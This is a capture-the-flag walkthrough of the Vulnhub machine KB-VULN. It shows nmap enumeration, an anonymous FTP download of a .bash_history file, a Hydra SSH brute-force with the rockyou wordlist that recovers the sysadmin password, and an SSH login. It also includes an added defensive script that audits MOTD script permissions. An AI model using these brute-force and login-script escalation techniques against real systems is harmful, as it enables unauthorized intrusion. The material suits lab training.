Today we are going to hack the Vulnhub machine called
KB-VULN. You can download it from the following link:
KB-VULN
Enumeration
We start with an nmap scan to see which ports
are open.
~ > nmap -A -p- 192.168.1.91
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST
Nmap scan report for 192.168.1.91
Host is up (0.00064s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.59
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
| 256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_ 256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OneSchool — Website by Colorlib
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
We can see that the FTP, SSH and HTTP ports are open.
In the source code of the initial web page we can
find the following comment:
Username : sysadmin
On the other hand, we connect to the FTP server using the credentials
anonymous/anonymous.
~/KB > ftp 192.168.1.91
Connected to 192.168.1.91.
220 (vsFTPd 3.0.3)
Name (192.168.1.91:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 .
drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 ..
-rw-r--r-- 1 0 0 54 Aug 22 17:39 .bash_history
226 Directory send OK.
We can see there is a .bash_history file.
We download it.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .bash_history (54 bytes).
226 Transfer complete.
54 bytes received in 0.00 secs (73.3441 kB/s)
ftp>
Let's take a look at the contents of the file...
~/KB > cat .bash_history
exit
ls
cd /etc/update-motd.d/
ls
nano 00-header
exit
We can see that it "edits" the file 00-header.
Only root should be able to edit that file, since
it is executed every time someone logs in to the system.
If we get access to the system and can edit that file, we can
use it to escalate our privileges.
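From the defender's side, the weakness here is a login-time script that a non-root user can write to. The following audit script is an added example, not part of the original writeup: it checks that every file in a MOTD script directory is owned by the expected user and is neither group- nor world-writable. It assumes GNU stat (Linux); the demo directory it builds is constructed for illustration and is not the KB-VULN box.

```shell
#!/bin/sh
# Audit a directory of login-time scripts (default: /etc/update-motd.d).
# pam_motd runs every script there as root on each login, so each file must
# be owned by root and must not be writable by group or others.
# Prints one line per finding; returns 1 if anything is wrong, 0 if clean.
# Usage: audit_motd_dir [DIR] [EXPECTED_OWNER]
audit_motd_dir() {
    dir="${1:-/etc/update-motd.d}"
    expected_owner="${2:-root}"
    rc=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue            # skip when the glob matches nothing
        owner=$(stat -c '%U' "$f")         # GNU stat: owner name
        perms=$(stat -c '%A' "$f")         # GNU stat: e.g. -rwxrwxr-x
        if [ "$owner" != "$expected_owner" ]; then
            echo "OWNER   $f owned by $owner, expected $expected_owner"
            rc=1
        fi
        # character 6 of the mode string is the group write bit
        case "$perms" in
            ?????w*) echo "GROUPWR $f is group-writable ($perms)"; rc=1 ;;
        esac
        # character 9 of the mode string is the world write bit
        case "$perms" in
            ????????w*) echo "WORLDWR $f is world-writable ($perms)"; rc=1 ;;
        esac
    done
    return "$rc"
}

# Constructed demo directory (not the real system): one safe script and one
# group-writable 00-header, the kind of misconfiguration the audit should catch.
make_demo_motd_dir() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "WELCOME TO THE KB-SERVER"\n' > "$d/00-header"
    printf '#!/bin/sh\necho "help"\n' > "$d/10-help"
    chmod 0775 "$d/00-header"   # group-writable: the finding we want
    chmod 0755 "$d/10-help"     # correct permissions
    echo "$d"
}

# Stand-alone run against the demo directory, expecting the current user as owner.
demo=$(make_demo_motd_dir)
audit_motd_dir "$demo" "$(id -un)" || echo "audit of $demo: findings present"
rm -rf "$demo"
```

On a real host run it as audit_motd_dir with no arguments, and fix findings with chown root:root and chmod 755 on the offending scripts.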
Since there is nowhere else to go, we brute-force SSH for the user
we found in the web page comment, sysadmin.
~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt 192.168.1.91 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 10:56:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.91:22/
[22][ssh] host: 192.168.1.91 login: sysadmin password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 10:56:54
We found the password :)
Let's log in!
Low Shell
~ > ssh sysadmin@192.168.1.91
sysadmin@192.168.1.91's password:
WELCOME TO THE KB-SERVER
Last login: Sat Aug 22 18:00:48 2020
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
sysadmin@kb-server:~$